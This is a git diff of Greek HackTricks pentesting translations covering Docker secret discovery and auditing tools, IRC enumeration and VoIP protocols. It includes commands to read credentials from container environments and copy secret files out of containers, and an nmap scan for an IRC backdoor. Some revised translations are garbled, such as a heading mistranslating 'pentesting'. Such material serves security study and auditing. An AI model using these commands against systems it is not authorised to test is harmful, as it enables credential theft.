### Ανακάλυψη μυστικών σε ενεργά Docker containers
|
||||
```bash
|
||||
docker ps [| grep <kubernetes_service_name>]
|
||||
docker inspect <docker_id>
|
||||
```
|
||||
Ελέγξτε το **env** (τμήμα μεταβλητών περιβάλλοντος) για μυστικά και μπορεί να βρείτε:
|
||||
Ελέγξτε το **env** (τμήμα μεταβλητών περιβάλλοντος) για μυστικά και ενδέχεται να βρείτε:
|
||||
|
||||
* Κωδικούς πρόσβασης.
|
||||
* Διευθύνσεις IP.
|
||||
|
@ -236,7 +238,7 @@ docker inspect <docker_id>
|
|||
* Διαδρομές.
|
||||
* Άλλα... .
|
||||
|
||||
Αν θέλετε να εξάγετε ένα αρχείο:
|
||||
Εάν θέλετε να εξάγετε ένα αρχείο:
|
||||
```bash
|
||||
docker cp <docket_id>:/etc/<secret_01> <secret_01>
|
||||
```
|
||||
|
@ -248,7 +250,7 @@ docker cp <docket_id>:/etc/<secret_01> <secret_01>
|
|||
* `./docker-bench-security.sh`
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/kost/dockscan](https://github.com/kost/dockscan) για να ελέγξετε την τρέχουσα εγκατάσταση του Docker σας.
|
||||
* `dockscan -v unix:///var/run/docker.sock`
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained) για να δείτε τα προνόμια που θα έχει ένας container όταν εκτελεστεί με διαφορετικές επιλογές ασφαλείας. Αυτό είναι χρήσιμο για να γνωρίζετε τις επιπτώσεις της χρήσης ορισμένων επιλογών ασφαλείας για την εκτέλεση ενός container:
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained) για να δείτε τα προνόμια που θα έχει ένας container όταν τρέχει με διαφορετικές επιλογές ασφαλείας. Αυτό είναι χρήσιμο για να γνωρίζετε τις επιπτώσεις της χρήσης ορισμένων επιλογών ασφαλείας για την εκτέλεση ενός container:
|
||||
* `docker run --rm -it r.j3ss.co/amicontained`
|
||||
* `docker run --rm -it --pid host r.j3ss.co/amicontained`
|
||||
* `docker run --rm -it --security-opt "apparmor=unconfined" r.j3ss.co/amicontained`
|
||||
|
@ -261,22 +263,22 @@ docker cp <docket_id>:/etc/<secret_01> <secret_01>
|
|||
|
||||
#### Ασφάλεια των Dockerfiles
|
||||
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter) για **να ελέγξετε το Dockerfile** σας και να βρείτε όλες τις μη σωστές ρυθμίσεις. Κάθε μη σωστή ρύθμιση θα δοθεί ένα ID, μπορείτε να βρείτε εδώ [https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md) πώς να διορθώσετε κάθε μία από αυτές.
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter) για **να ελέγξετε το Dockerfile** σας και να βρείτε όλους τους τύπους λανθασμένων ρυθμίσεων. Κάθε λανθασμένη ρύθμιση θα δοθεί ένα αναγνωριστικό, μπορείτε να βρείτε εδώ [https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md) πώς να διορθώσετε κάθε μία από αυτές.
|
||||
* `dockerfilelinter -f Dockerfile`
|
||||
|
||||
![](<../.gitbook/assets/image (173).png>)
|
||||
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/replicatedhq/dockerfilelint](https://github.com/replicatedhq/dockerfilelint) για **να ελέγξετε το Dockerfile** σας και να βρείτε όλες τις μη σωστές ρυθμίσεις.
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/replicatedhq/dockerfilelint](https://github.com/replicatedhq/dockerfilelint) για **να ελέγξετε το Dockerfile** σας και να βρείτε όλους τους τύπους λανθασμένων ρυθμίσεων.
|
||||
* `dockerfilelint Dockerfile`
|
||||
|
||||
![](<../.gitbook/assets/image (209).png>)
|
||||
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/RedCoolBeans/dockerlint](https://github.com/RedCoolBeans/dockerlint) για **να ελέγξετε το Dockerfile** σας και να βρείτε όλες τις μη σωστές ρυθμίσεις.
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/RedCoolBeans/dockerlint](https://github.com/RedCoolBeans/dockerlint) για **να ελέγξετε το Dockerfile** σας και να βρείτε όλους τους τύπους λανθασμένων ρυθμίσεων.
|
||||
* `dockerlint Dockerfile`
|
||||
|
||||
![](<../.gitbook/assets/image (68).png>)
|
||||
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/hadolint/hadolint](https://github.com/hadolint/hadolint) για **να ελέγξετε το Dockerfile** σας και να βρείτε όλες τις μη σωστές ρυθμίσεις.
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/hadolint/hadolint](https://github.com/hadolint/hadolint) για **να ελέγξετε το Dockerfile** σας και να βρείτε όλους τους τύπους λανθασμένων ρυθμίσεων.
|
||||
* `hadolint Dockerfile`
|
||||
|
||||
![](<../.gitbook/assets/image (498).png>)
|
||||
|
@ -284,7 +286,7 @@ docker cp <docket_id>:/etc/<secret_01> <secret_01>
|
|||
#### Καταγραφή Υπούλων Δραστηριοτήτων
|
||||
|
||||
* Μπορείτε να χρησιμοποιήσετε το εργαλείο [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) για να ανιχνεύσετε **υπούλες συμπεριφορές σε εκτελούμενα containers**.
|
||||
* Σημειώστε στο ακόλουθο τμήμα πώς **ο Falco συντάσσει ένα πυρήνα module και τον εισάγει**. Έπειτα, φορτώνει τους κανόνες και **ξεκινά την καταγραφή ύποπτων δραστηριοτήτων**. Σε αυτήν την περίπτωση, έχει ανιχνεύσει 2 προνομιούχα containers που ξεκίνησαν, έναν εκ των οποίων με ευαίσθητο mount, και μετά από λίγα δευτερόλεπτα ανιχνεύθηκε πώς άνοιξε ένα κέλυφος μέσα σε έναν από τους containers.
|
||||
* Σημειώστε στο ακόλουθο τμήμα πώς **ο Falco συντάσσει ένα πυρήνα module και τον εισάγει**. Έπειτα, φορτώνει τους κανόνες και **ξεκινά την καταγραφή ύποπτων δραστηριοτήτων**. Σε αυτήν την περίπτωση, έχει ανιχνευθεί ότι ξεκίνησαν 2 προνομιούχα containers, ένας εξ' αυτών με ευαίσθητο mount, και μετά από λίγα δευτερόλεπτα ανιχνεύθηκε πώς άνοιξε ένα κέλυφος μέσα σε έναν από τους containers.
|
||||
```bash
|
||||
docker run -it --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro falco
|
||||
* Setting up /usr/src links from host
|
||||
|
@ -335,13 +337,13 @@ falco-probe found and loaded in dkms
|
|||
* [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των απαγωγών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
|
@ -358,6 +360,6 @@ falco-probe found and loaded in dkms
|
|||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,8 +1,8 @@
|
|||
# 194,6667,6660-7000 - Ελεγχος Εισβολής στο IRC
|
||||
# 194,6667,6660-7000 - Ελεγχος Ευπειθής Στο IRC
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρός Συνεργάτης AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
|
@ -14,15 +14,15 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των καταλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -30,11 +30,11 @@
|
|||
|
||||
## Βασικές Πληροφορίες
|
||||
|
||||
Το IRC, αρχικά ένα **πρωτόκολλο κειμένου**, ανατέθηκε στο **194/TCP** από το IANA, αλλά συνήθως λειτουργεί στα **6667/TCP** και παρόμοιες θύρες για να μην χρειάζεται **δικαιώματα ρίζας** για λειτουργία.
|
||||
Το IRC, αρχικά ένα **πρωτόκολλο κειμένου**, ανατέθηκε στο **194/TCP** από το IANA, αλλά συνήθως λειτουργεί στα **6667/TCP** και παρόμοιες θύρες για να μην απαιτείται η **ριζική δικαιοδοσία** για τη λειτουργία του.
|
||||
|
||||
Ένα **ψευδώνυμο** είναι ό,τι χρειάζεται για να συνδεθείτε σε ένα διακομιστή. Μετά τη σύνδεση, ο διακομιστής εκτελεί αναζήτηση αντίστροφης DNS στη διεύθυνση IP του χρήστη.
|
||||
Ένα **ψευδώνυμο** είναι όλο που χρειάζεται για να συνδεθείτε σε ένα διακομιστή. Μετά τη σύνδεση, ο διακομιστής εκτελεί μια αναζήτηση αντίστροφης DNS στη διεύθυνση IP του χρήστη.
|
||||
|
||||
Οι χρήστες διαιρούνται σε **operators**, που χρειάζονται ένα **όνομα χρήστη** και **κωδικό πρόσβασης** για περισσότερη πρόσβαση, και κανονικούς **χρήστες**. Οι operators έχουν διαφορετικά επίπεδα προνομίων, με τους διαχειριστές στην κορυφή.
|
||||
Οι χρήστες διαιρούνται σε **χειριστές**, που χρειάζονται ένα **όνομα χρήστη** και **κωδικό πρόσβασης** για περισσότερη πρόσβαση, και κανονικούς **χρήστες**. Οι χειριστές έχουν διαφορετικά επίπεδα προνομίων, με τους διαχειριστές στην κορυφή.
|
||||
|
||||
**Προεπιλεγμένες θύρες:** 194, 6667, 6660-7000
|
||||
```
|
||||
|
@ -91,19 +91,19 @@ USER test1 test2 <IP> :test3
|
|||
```bash
|
||||
nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 <ip>
|
||||
```
|
||||
### [Επίθεση Με Βίαιο Κατάληψη (Brute Force)](../generic-methodologies-and-resources/brute-force.md#irc)
|
||||
### [Επίθεση Με Βίαιο Εξαναγκασμό](../generic-methodologies-and-resources/brute-force.md#irc)
|
||||
|
||||
### Shodan
|
||||
|
||||
* `αναζήτηση του ονόματος του υπολογιστή σας`
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των καταλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
|
|
|
@ -14,13 +14,13 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κλοπή πληροφοριών.
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
|
@ -40,29 +40,25 @@
|
|||
|
||||
### MGCP (Πρωτόκολλο Έλεγχου Πύλης Μέσων)
|
||||
|
||||
Το MGCP (Media Gateway Control Protocol) είναι ένα **πρωτόκολλο σήμανσης** και **έλεγχου κλήσεων** που περιγράφεται στο RFC 3435. Λειτουργεί σε μια κεντρική αρχιτεκτονική, η οποία αποτελείται από τρία κύρια στοιχεία:
|
||||
Το MGCP (Πρωτόκολλο Έλεγχου Πύλης Μέσων) είναι ένα **πρωτόκολλο σήμανσης** και **έλεγχου κλήσεων** που περιγράφεται στο RFC 3435. Λειτουργεί σε μια κεντρική αρχιτεκτονική, η οποία αποτελείται από τρία κύρια στοιχεία:
|
||||
|
||||
1. **Πράκτορας Κλήσης ή Ελεγκτής Πύλης Μέσων (MGC)**: Η κύρια πύλη στην αρχιτεκτονική του MGCP είναι υπεύθυνη για τη **διαχείριση και έλεγχο των πυλών μέσων**. Χειρίζεται τις διαδικασίες εγκατάστασης, τροποποίησης και τερματισμού κλήσεων. Ο MGC επικοινωνεί με τις πύλες μέσων χρησιμοποιώντας το πρωτόκολλο MGCP.
|
||||
2. **Πύλες Μέσων (MGs) ή Πύλες Δούλων**: Αυτές οι συσκευές **μετατρέπουν ψηφιακά ρεύματα μέσων μεταξύ διαφορετικών δικτύων**, όπως οι παραδοσιακές τηλεφωνίες με κύκλωμα εναλλαγής και τα δίκτυα IP με κύκλωμα πακέτων. Διαχειρίζονται από το MGC και εκτελούν εντολές που λαμβάνουν από αυτό. Οι πύλες μέσων μπορεί να περιλαμβάνουν λειτουργίες όπως μετατροπή κωδικοποίησης, πακετοποίηση και ακύρωση ηχούς.
|
||||
2. **Πύλες Μέσων (MGs) ή Πύλες Δούλων**: Αυτές οι συσκευές **μετατρέπουν ψηφιακά ρεύματα μέσων μεταξύ διαφορετικών δικτύων**, όπως η παραδοσιακή τηλεφωνία με κύκλωμα εναλλαγής και τα δίκτυα IP με κύκλωμα μετάδοσης πακέτων. Διαχειρίζονται από το MGC και εκτελούν εντολές που λαμβάνουν από αυτό. Οι πύλες μέσων μπορεί να περιλαμβάνουν λειτουργίες όπως μετατροπή κωδικοποίησης, πακετοποίηση και ακύρωση ηχούς.
|
||||
3. **Πύλες Σήμανσης (SGs)**: Αυτές οι πύλες είναι υπεύθυνες για τη **μετατροπή μηνυμάτων σήμανσης μεταξύ διαφορετικών δικτύων**, επιτρέποντας απρόσκοπτη επικοινωνία μεταξύ παραδοσιακών συστημάτων τηλεφωνίας (π.χ. SS7) και δικτύων βασισμένων σε IP (π.χ. SIP ή H.323). Οι πύλες σήμανσης είναι κρίσιμες για την αλληλεπίδραση και τη διασφάλιση ότι οι πληροφορίες ελέγχου κλήσης μεταδίδονται σωστά μεταξύ των διαφορετικών δικτύων.
|
||||
|
||||
Συνολικά, το MGCP κεντρικοποιεί τη λογική έλεγχου κλήσεων στον πράκτορα κλήσεων, το οποίο απλοποιεί τη διαχείριση των πυλών μέσων και σήμανσης, παρέχοντας καλύτερη επεκτασιμότητα, αξιοπιστία και αποτελεσματικότητα στα τηλεπικοινωνιακά δίκτυα.
|
||||
|
||||
### SCCP (Πρωτόκολλο Ελέγχου Πελάτη Skinny)
|
||||
|
||||
Το Skinny Client Control Protocol (SCCP) είναι ένα **ιδιόκτητο πρωτόκολλο σήμανσης και ελέγχου κλήσεων** που ανήκει στην Cisco Systems. Χρησιμοποιείται κυρίως για την επικοινωνία μεταξύ του **Cisco Unified Communications Manager** (προηγουμένως γνωστού ως CallManager) και των Cisco IP τηλεφώνων ή άλλων Cisco συσκευών φωνής και βίντεο.
|
||||
Το Πρωτόκολλο Ελέγχου Πελάτη Skinny (SCCP) είναι ένα **ιδιόκτητο πρωτόκολλο σήμανσης και ελέγχου κλήσεων** που ανήκει στην Cisco Systems. Χρησιμοποιείται κυρίως για την επικοινωνία μεταξύ του **Cisco Unified Communications Manager** (προηγουμένως γνωστού ως CallManager) και των Cisco IP τηλεφώνων ή άλλων τερματικών φωνής και βίντεο της Cisco.
|
||||
|
||||
Τα κύρια στοιχεία ενός συστήματος βασισμένου στο SCCP είναι:
|
||||
|
||||
1. **Διακομιστής Ελέγχου Κλήσεων**: Αυτός ο διακομιστής, συνήθως ένας Cisco Unified Communications Manager, διαχειρίζεται τις διαδικασίες εγκατάστασης κλήσεων, τροποποίησης και τερματισμού, καθώς και άλλες λειτουργίες τηλεφωνίας όπως προώθηση κλήσεων, μεταφορά κλήσεων και κράτηση κλήσεων.
|
||||
2. **Σημεία Τέλους SCCP**: Αυτές είναι συσκευές όπως IP τηλέφωνα, μονάδες βιντεοδιάσκεψης ή άλλες Cisco συσκευές φωνής και βίντεο που χρησιμοποιούν το SCCP για να επικοινωνήσουν με το διακομιστή ελέγχου κλήσεων. Εγγράφονται στο διακομιστή, στέλνουν και λαμβάνουν μηνύματα σήμανσης και ακολουθούν τις οδηγίες που παρέχει ο διακομιστής ελέγχου κλήσεων για τη διαχείριση κλήσεων.
|
||||
3. **Πύλες**: Αυτές οι συσκευές, όπως πύλες φωνής ή πύλες μέσων, είναι υπεύθυνες για τη μετατροπή ροών μέσων μεταξύ διαφορετικών δικτύων, όπως οι παραδοσιακές τηλεφωνίες με κύκλωμα εναλλαγής και τα δίκτυα IP με κύκλωμα πακέτων. Μπορεί να περιλαμβάνουν επιπλέον λειτουργίες, όπως μετατροπή κωδικοποίησης ή ακύρωση ηχούς.
|
||||
1. **Διακομιστής Ελέγχου Κλήσεων**: Αυτός ο διακομιστής, συνήθως ένας Cisco Unified Communications Manager, διαχειρίζεται τις διαδικασίες εγκατάστασης κλήσεων, τροποποίησης και τερματισμού, καθώς και άλλες λειτουργίες τηλεφωνίας όπως η μεταφορά κλήσης, η μεταφορά κλήσης και το κράτημα κλήσης.
|
||||
2. **Τερματικά SCCP**: Αυτές είναι συσκευές όπως IP τηλέφωνα, μονάδες βιντεοδιάσκεψης ή άλλα τερματικά φωνής και βίντεο της Cisco που χρησιμοποιούν το SCCP για να επικοινωνήσουν με το διακομιστή ελέγχου κλήσεων. Καταχωρούνται στο διακομιστή, στέλνουν και λαμβάνουν μηνύματα σήμανσης και ακολουθούν τις οδηγίες που παρέχονται από το διακομιστή ελέγχου κλήσεων για τη διαχείριση των κλήσεων.
|
||||
3. **Πύλες**: Αυτές οι συσκευές, όπως πύλες φωνής ή πύλες μέσων, είναι υπεύθυνες για τη μετατροπή ροών μέσων μεταξύ διαφορετικών δικτύων, όπως η παραδοσιακή τηλεφωνία με κύκλωμα εναλλαγής και τα δίκτυα IP με κύκλωμα μετάδοσης πακέτων. Μπορεί να περιλαμβάνουν επιπλέον λειτουργίες, όπως μετατροπή κωδικοποίησης ή ακύρωση ηχούς.
|
||||
|
||||
Το SCCP προσφέρει έναν απλό και αποτελεσματικό τρόπο επικοινωνίας μεταξύ των διακομιστών ελέγχου κλήσεων Cisco και των σημείων τέλους. Ωστόσο, αξίζει να σημειωθεί ότι το **SCCP είναι ένα ιδιόκτητο πρωτόκολλο**, το οποίο μπορεί να περιορίσει την αλληλεπιδραστικότητα με μη-Cisco συστήματα. Σε τέτοιες περιπτώσεις, άλλα πρότυπα πρωτόκολλα VoIP όπως το SIP μπορεί να είναι πιο κατάλληλα.
|
||||
|
||||
### H.323
|
||||
|
||||
Το H.323 είναι ένα **
|
||||
Το SCCP προσφέρει έναν απλό και αποτελεσματικό τρόπο επικοινωνίας μεταξύ των διακομιστών ελέγχου κλήσεων Cisco και των τερματικών συσκευών. Ωστόσο, αξίζει να σημειωθεί ότι το **SCCP είναι ένα ιδιόκτητο πρωτόκολλο**, το οποίο μπορεί να περιορίσει την αλληλεπιδραστικότ
|
||||
## Πρωτόκολλα Μετάδοσης & Μεταφοράς
|
||||
|
||||
### SDP (Πρωτόκολλο Περιγραφής Συνεδρίας)
|
||||
|
@ -72,9 +68,9 @@
|
|||
Κάποια βασικά στοιχεία του SDP περιλαμβάνουν:
|
||||
|
||||
1. **Πληροφορίες Συνεδρίας**: Το SDP περιγράφει τις λεπτομέρειες μιας πολυμεσικής συνεδρίας, συμπεριλαμβανομένου του ονόματος της συνεδρίας, της περιγραφής της συνεδρίας, της ώρας έναρξης και λήξης.
|
||||
2. **Ροές Μέσων**: Το SDP ορίζει τα χαρακτηριστικά των ροών μέσων, όπως ο τύπος μέσου (ήχος, βίντεο, ή κείμενο), το πρωτόκολλο μεταφοράς (π.χ. RTP ή SRTP) και τη μορφή του μέσου (π.χ. πληροφορίες κωδικοποιητή).
|
||||
2. **Ροές Μέσων**: Το SDP ορίζει τα χαρακτηριστικά των ροών μέσων, όπως ο τύπος μέσου (ήχος, βίντεο, ή κείμενο), το πρωτόκολλο μεταφοράς (π.χ. RTP ή SRTP) και η μορφή του μέσου (π.χ. πληροφορίες κωδικοποιητή).
|
||||
3. **Πληροφορίες Σύνδεσης**: Το SDP παρέχει πληροφορίες σχετικά με τη διεύθυνση δικτύου (διεύθυνση IP) και τον αριθμό θύρας όπου πρέπει να σταλούν ή να ληφθούν τα μέσα.
|
||||
4. **Χαρακτηριστικά**: Το SDP υποστηρίζει τη χρήση χαρακτηριστικών για την παροχή επιπλέον, προαιρετικών πληροφοριών σχετικά με μια συνεδρία ή ροή μέσου. Τα χαρακτηριστικά μπορούν να χρησιμοποιηθούν για την καθορισμό διάφορων χαρακτηριστικών όπως κλειδιά κρυπτογράφησης, απαιτήσεις εύρους ζώνης ή μηχανισμούς ελέγχου μέσων.
|
||||
4. **Χαρακτηριστικά**: Το SDP υποστηρίζει τη χρήση χαρακτηριστικών για την παροχή επιπλέον, προαιρετικών πληροφοριών σχετικά με μια συνεδρία ή ροή μέσων. Τα χαρακτηριστικά μπορούν να χρησιμοποιηθούν για την καθορισμό διάφορων χαρακτηριστικών όπως κλειδιά κρυπτογράφησης, απαιτήσεις εύρους ζώνης ή μηχανισμούς ελέγχου μέσων.
|
||||
|
||||
Το SDP χρησιμοποιείται τυπικά στην ακόλουθη διαδικασία:
|
||||
|
||||
|
@ -88,6 +84,6 @@
|
|||
### RTP / RTCP / SRTP / ZRTP
|
||||
|
||||
1. **RTP (Πρωτόκολλο Μεταφοράς Πραγματικού Χρόνου)**: Το RTP είναι ένα πρωτόκολλο δικτύου σχεδιασμένο για τη μετάδοση δεδομένων ήχου και βίντεο, ή άλλων πολυμεσικών σε πραγματικό χρόνο, σε δίκτυα IP. Αναπτύχθηκε από το **IETF** και ορίζεται στο **RFC 3550**. Το RTP χρησιμοποιείται συνήθως με πρωτόκολλα σήμανσης όπως το SIP και το H.323 για να επιτρέψει την πολυμεσική επικοινωνία. Το RTP παρέχει μηχανισμούς για **συγχρονισμό**, **ακολουθία** και **σήμανση χρόνου** των ροών μέσων, βοηθώντας στην εξασφάλιση ομαλής και έγκαιρης αναπαραγωγής μέσων.
|
||||
2. **RTCP (Πρωτόκολλο Έλεγχου Μεταφοράς Πραγματικού Χρόνου)**: Το RTCP είναι ένα συνοδευτικό πρωτόκολλο του RTP, χρησιμοποιούμενο για την παρακολούθηση της ποιότητας υπηρεσιών (QoS) και την παροχή ανατροφοδότησης σχετικά με τη μετάδοση των ροών μέσων. Ορίζεται στο ίδιο **RFC 3550** με το RTP, το RTCP **ανταλλάσσει περιοδικά πακέτα ελέγχου μεταξύ συμμετεχόντων σε μια συνεδρία RTP**. Μοιράζεται πληροφορίες όπως απώλεια πακέτων, θόρυβος και χρόνος κυκλοφορίας, τα οποία βοηθούν στη διάγνωση και προσαρμογή στις συνθήκες του δικτύου, βελτιώνοντας συνολικά την ποιότητα των μέσων.
|
||||
2. **RTCP (Πρωτόκολλο Έλεγχου Μεταφοράς Πραγματικού Χρόνου)**: Το RTCP είναι ένα συνοδευτικό πρωτόκολλο του RTP, χρησιμοποιείται για την παρακολούθηση της ποιότητας υπηρεσιών (QoS) και την παροχή ανατροφοδότησης σχετικά με τη μετάδοση των ροών μέσων. Ορίζεται στο ίδιο **RFC 3550** με το RTP, το RTCP **ανταλλάσσει περιοδικά πακέτα ελέγχου μεταξύ συμμετεχόντων σε μια συνεδρία RTP**. Μοιράζεται πληροφορίες όπως απώλεια πακέτων, θόρυβος και χρόνος κυκλοφορίας, τα οποία βοηθούν στη διάγνωση και προσαρμογή στις συνθήκες του δικτύου, βελτιώνοντας τη συνολική ποιότητα των μέσων.
|
||||
